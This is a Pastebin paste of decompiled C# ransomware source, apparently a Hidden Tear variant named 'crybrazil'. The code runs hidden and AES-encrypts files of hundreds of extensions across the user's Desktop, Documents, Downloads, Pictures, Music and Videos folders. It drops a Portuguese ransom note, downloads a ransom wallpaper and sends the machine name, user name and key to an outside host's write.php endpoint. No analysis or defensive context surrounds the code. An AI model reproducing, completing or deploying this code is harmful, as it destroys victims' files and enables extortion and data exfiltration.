Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.ComponentModel;
- using System.Diagnostics;
- using System.Drawing;
- using System.IO;
- using System.Linq;
- using System.Net;
- using System.Runtime.InteropServices;
- using System.Security.Cryptography;
- using System.Text;
- using System.Windows.Forms;
- namespace hidden_tear
- {
- // Token: 0x02000002 RID: 2
- public class Form1 : Form
- {
- // Token: 0x06000001 RID: 1
- [DllImport("user32.dll", CharSet = CharSet.Auto)]
- private static extern int SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
- // Token: 0x06000002 RID: 2 RVA: 0x000020E0 File Offset: 0x000002E0
- public Form1()
- {
- this.InitializeComponent();
- }
- // Token: 0x06000003 RID: 3 RVA: 0x00002058 File Offset: 0x00000258
- private void Form1_Load(object sender, EventArgs e)
- {
- base.Opacity = 0.0;
- base.ShowInTaskbar = false;
- this.startAction();
- }
- // Token: 0x17000001 RID: 1
- // (get) Token: 0x06000004 RID: 4 RVA: 0x0000213C File Offset: 0x0000033C
- protected override CreateParams CreateParams
- {
- get
- {
- CreateParams createParams = base.CreateParams;
- createParams.ExStyle |= 128;
- return createParams;
- }
- }
- // Token: 0x06000005 RID: 5 RVA: 0x00002076 File Offset: 0x00000276
- private void Form_Shown(object sender, EventArgs e)
- {
- base.Visible = false;
- base.Opacity = 100.0;
- }
- // Token: 0x06000006 RID: 6 RVA: 0x00002168 File Offset: 0x00000368
- public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
- {
- byte[] result = null;
- byte[] salt = new byte[]
- {
- 1,
- 2,
- 3,
- 4,
- 5,
- 6,
- 7,
- 8
- };
- using (MemoryStream memoryStream = new MemoryStream())
- {
- using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
- {
- rijndaelManaged.KeySize = 256;
- rijndaelManaged.BlockSize = 128;
- Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
- rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
- rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
- rijndaelManaged.Mode = CipherMode.CBC;
- using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
- {
- cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
- cryptoStream.Close();
- }
- result = memoryStream.ToArray();
- }
- }
- return result;
- }
- // Token: 0x06000007 RID: 7 RVA: 0x00002270 File Offset: 0x00000470
- public string CreatePassword(int length)
- {
- StringBuilder stringBuilder = new StringBuilder();
- Random random = new Random();
- while (0 < length--)
- {
- stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]);
- }
- return stringBuilder.ToString();
- }
- // Token: 0x06000008 RID: 8 RVA: 0x000022C0 File Offset: 0x000004C0
- public void SendPassword(string password)
- {
- try
- {
- string str = string.Concat(new string[]
- {
- this.computerName,
- "-",
- this.userName,
- " ",
- password
- });
- string address = this.targetURL + str;
- new WebClient().DownloadString(address);
- }
- catch (Exception)
- {
- }
- }
- // Token: 0x06000009 RID: 9 RVA: 0x00002330 File Offset: 0x00000530
- public void EncryptFile(string file, string password)
- {
- byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
- byte[] array = Encoding.UTF8.GetBytes(password);
- array = SHA256.Create().ComputeHash(array);
- byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);
- string str = "Users\\";
- string str2 = str + this.userName + "\\Desktop\\SUA_CHAVE.html.hacked";
- string path = this.userDir + str2;
- if (File.Exists(path))
- {
- File.Delete(path);
- }
- File.WriteAllBytes(file, bytes);
- File.Move(file, file + ".crybrazil");
- }
- // Token: 0x0600000A RID: 10 RVA: 0x000023B8 File Offset: 0x000005B8
- public void encryptDirectory(string location, string password)
- {
- try
- {
- string[] source = new string[]
- {
- ".dat",
- ".keychain",
- ".sdf",
- ".vcf",
- ".jpg",
- ".png",
- ".tiff",
- ".tif",
- ".gif",
- ".jpeg",
- ".jif",
- ".jfif",
- ".jp2",
- ".jpx",
- ".j2k",
- ".j2c",
- ".fpx",
- ".pcd",
- ".bmp",
- ".svg",
- ".3dm",
- ".3ds",
- ".max",
- ".obj",
- ".dds",
- ".psd",
- ".tga",
- ".thm",
- ".yuv",
- ".ai",
- ".eps",
- ".ps",
- ".indd",
- ".pct",
- ".mp4",
- ".avi",
- ".mkv",
- ".3g2",
- ".3gp",
- ".asf",
- ".flv",
- ".m4v",
- ".mov",
- ".mpg",
- ".rm",
- ".srt",
- ".swf",
- ".vob",
- ".wmv",
- ".doc",
- ".docx",
- ".txt",
- ".pdf",
- ".log",
- ".msg",
- ".odt",
- ".pages",
- ".rtf",
- ".tex",
- ".wpd",
- ".wps",
- ".csv",
- ".ged",
- ".key",
- ".pps",
- ".ppt",
- ".pptx",
- ".xml",
- ".json",
- ".xlsx",
- ".xlsm",
- ".xlsb",
- ".xls",
- ".mht",
- ".mhtml",
- ".htm",
- ".html",
- ".xltx",
- ".prn",
- ".dif",
- ".slk",
- ".xlam",
- ".xla",
- ".ods",
- ".docm",
- ".dotx",
- ".dotm",
- ".xps",
- ".ics",
- ".mp3",
- ".aif",
- ".iff",
- ".m3u",
- ".m4a",
- ".mid",
- ".mpa",
- ".wav",
- ".wma",
- ".msi",
- ".php",
- ".apk",
- ".app",
- ".bat",
- ".cgi",
- ".com",
- ".asp",
- ".aspx",
- ".cer",
- ".cfm",
- ".css",
- ".js",
- ".jsp",
- ".rss",
- ".xhtml",
- ".c",
- ".class",
- ".cpp",
- ".cs",
- ".h",
- ".java",
- ".lua",
- ".pl",
- ".py",
- ".sh",
- ".sln",
- ".swift",
- ".vb",
- ".vcxproj",
- ".dem",
- ".gam",
- ".nes",
- ".rom",
- ".sav",
- ".tgz",
- ".zip",
- ".rar",
- ".tar",
- ".7z",
- ".cbr",
- ".deb",
- ".gz",
- ".pkg",
- ".rpm",
- ".zipx",
- ".iso",
- ".accdb",
- ".db",
- ".dbf",
- ".mdb",
- ".sql",
- ".fnt",
- ".fon",
- ".otf",
- ".ttf",
- ".cfg",
- ".prf",
- ".bak",
- ".old",
- ".tmp",
- ".torrent",
- ".der",
- ".pfx",
- ".crt",
- ".csr",
- ".p12",
- ".pem",
- ".ott",
- ".sxw",
- ".stw",
- ".uot",
- ".ots",
- ".sxc",
- ".stc",
- ".wb2",
- ".odp",
- ".otp",
- ".sxd",
- ".std",
- ".uop",
- ".odg",
- ".otg",
- ".sxm",
- ".mml",
- ".lay",
- ".lay6",
- ".asc",
- ".sqlite3",
- ".sqlitedb",
- ".odb",
- ".frm",
- ".myd",
- ".myi",
- ".ibd",
- ".mdf",
- ".ldf",
- ".suo",
- ".pas",
- ".asm",
- ".cmd",
- ".ps1",
- ".vbs",
- ".dip",
- ".dch",
- ".sch",
- ".brd",
- ".rb",
- ".jar",
- ".fla",
- ".mpeg",
- ".m4u",
- ".djvu",
- ".nef",
- ".cgm",
- ".raw",
- ".vcd",
- ".backup",
- ".tbk",
- ".bz2",
- ".PAQ",
- ".aes",
- ".gpg",
- ".vmx",
- ".vmdk",
- ".vdi",
- ".sldm",
- ".sldx",
- ".sti",
- ".sxi",
- ".602",
- ".hwp",
- ".edb",
- ".potm",
- ".potx",
- ".ppam",
- ".ppsx",
- ".ppsm",
- ".pot",
- ".pptm",
- ".xltm",
- ".xlc",
- ".xlm",
- ".xlt",
- ".xlw",
- ".dot",
- ".docb",
- ".snt",
- ".onetoc2",
- ".dwg",
- ".wk1",
- ".wks",
- ".123",
- ".vsdx",
- ".vsd",
- ".eml",
- ".ost",
- ".pst"
- };
- string[] files = Directory.GetFiles(location);
- string[] directories = Directory.GetDirectories(location);
- for (int i = 0; i < files.Length; i++)
- {
- string extension = Path.GetExtension(files[i]);
- if (source.Contains(extension))
- {
- this.EncryptFile(files[i], password);
- }
- }
- for (int i = 0; i < directories.Length; i++)
- {
- this.encryptDirectory(directories[i], password);
- }
- }
- catch (Exception)
- {
- }
- }
- // Token: 0x0600000B RID: 11 RVA: 0x00002FC8 File Offset: 0x000011C8
- public void MoveVirus()
- {
- string path = this.userDir + this.userName + "\\Rand123";
- string text = this.userDir + this.userName + "\\Rand123\\local.exe";
- if (!Directory.Exists(path))
- {
- Directory.CreateDirectory(path);
- }
- else if (File.Exists(text))
- {
- File.Delete(text);
- }
- string str = "\\" + Process.GetCurrentProcess().ProcessName + ".exe";
- string text2 = Directory.GetCurrentDirectory() + str;
- string sourceFileName = text2;
- File.Move(sourceFileName, text);
- }
- // Token: 0x0600000C RID: 12 RVA: 0x00003058 File Offset: 0x00001258
- public static bool CheckForInternetConnection()
- {
- bool result;
- try
- {
- using (WebClient webClient = new WebClient())
- {
- using (webClient.OpenRead("https://www.google.fr"))
- {
- result = true;
- }
- }
- }
- catch
- {
- result = false;
- }
- return result;
- }
- // Token: 0x0600000D RID: 13 RVA: 0x000030C4 File Offset: 0x000012C4
- public void startAction()
- {
- string password = "AA151257B1462D642E7E21FF9C80F83CAF043C3572D5ED59BD283D20641E3C9D";
- this.MoveVirus();
- this.Directory_Settings_Sending(password);
- this.messageCreator();
- string path = this.userDir + this.userName + "\\ranso4.jpg";
- bool flag;
- do
- {
- if (flag = Form1.CheckForInternetConnection())
- {
- this.SetWallpaperFromWeb(this.backgroundImageUrl, path);
- this.SendPassword(password);
- }
- }
- while (!flag);
- Application.Exit();
- }
- // Token: 0x0600000E RID: 14 RVA: 0x00003138 File Offset: 0x00001338
- public void Directory_Settings_Sending(string password)
- {
- string str = "Users\\";
- string location = this.userDir + str + this.userName + "\\Desktop";
- string location2 = this.userDir + str + this.userName + "\\Documents";
- string location3 = this.userDir + str + this.userName + "\\Downloads";
- string location4 = this.userDir + str + this.userName + "\\Pictures";
- string location5 = this.userDir + str + this.userName + "\\Music";
- string location6 = this.userDir + str + this.userName + "\\Videos";
- this.encryptDirectory(location, password);
- this.encryptDirectory(location2, password);
- this.encryptDirectory(location3, password);
- this.encryptDirectory(location4, password);
- this.encryptDirectory(location5, password);
- this.encryptDirectory(location6, password);
- }
- // Token: 0x0600000F RID: 15 RVA: 0x00003214 File Offset: 0x00001414
- public void messageCreator()
- {
- string str = "\\Desktop\\SUA_CHAVE.html";
- string path = this.userDir + "Users\\" + this.userName + str;
- this.computerName + "-" + this.userName;
- string[] contents = new string[]
- {
- "<a href= 'http://3e24c23r2213122c1cxdsxsd.unaux.com' target='_blank'<H3>O QUE ESTΓ ACONTECENDO?</H3></a>"
- };
- File.WriteAllLines(path, contents);
- }
- // Token: 0x06000010 RID: 16 RVA: 0x0000208E File Offset: 0x0000028E
- public void SetWallpaper(string path)
- {
- Form1.SystemParametersInfo(20u, 0u, path, 3u);
- }
- // Token: 0x06000011 RID: 17 RVA: 0x00003274 File Offset: 0x00001474
- private void SetWallpaperFromWeb(string url, string path)
- {
- try
- {
- WebClient webClient = new WebClient();
- webClient.DownloadFile(new Uri(url), path);
- this.SetWallpaper(path);
- }
- catch (Exception)
- {
- }
- }
- // Token: 0x06000012 RID: 18 RVA: 0x000032B4 File Offset: 0x000014B4
- protected override void Dispose(bool disposing)
- {
- if (disposing && this.components != null)
- {
- this.components.Dispose();
- }
- base.Dispose(disposing);
- }
- // Token: 0x06000013 RID: 19 RVA: 0x000032E4 File Offset: 0x000014E4
- private void InitializeComponent()
- {
- ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(Form1));
- base.SuspendLayout();
- base.AutoScaleDimensions = new SizeF(6f, 13f);
- base.AutoScaleMode = AutoScaleMode.Font;
- base.ClientSize = new Size(124, 53);
- base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
- base.Name = "Form1";
- this.Text = "projet";
- base.Load += this.Form1_Load;
- base.ResumeLayout(false);
- }
- // Token: 0x04000001 RID: 1
- private string targetURL = "http://3e24c23r2213122c1cxdsxsd.unaux.com/crybrazil/write.php?info=";
- // Token: 0x04000002 RID: 2
- private string userName = Environment.UserName;
- // Token: 0x04000003 RID: 3
- private string computerName = Environment.MachineName.ToString();
- // Token: 0x04000004 RID: 4
- private string userDir = "C:\\";
- // Token: 0x04000005 RID: 5
- private string backgroundImageUrl = "http://4.bp.blogspot.com/-11m8rWaFmWs/WuhochGTK0I/AAAAAAAAFTY/VkbbVhxYZDgW_jlbQ5lPbV8AEhyd4ihgQCK4BGAYYCw/s1600/ranso4.jpg";
- // Token: 0x04000006 RID: 6
- private IContainer components = null;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement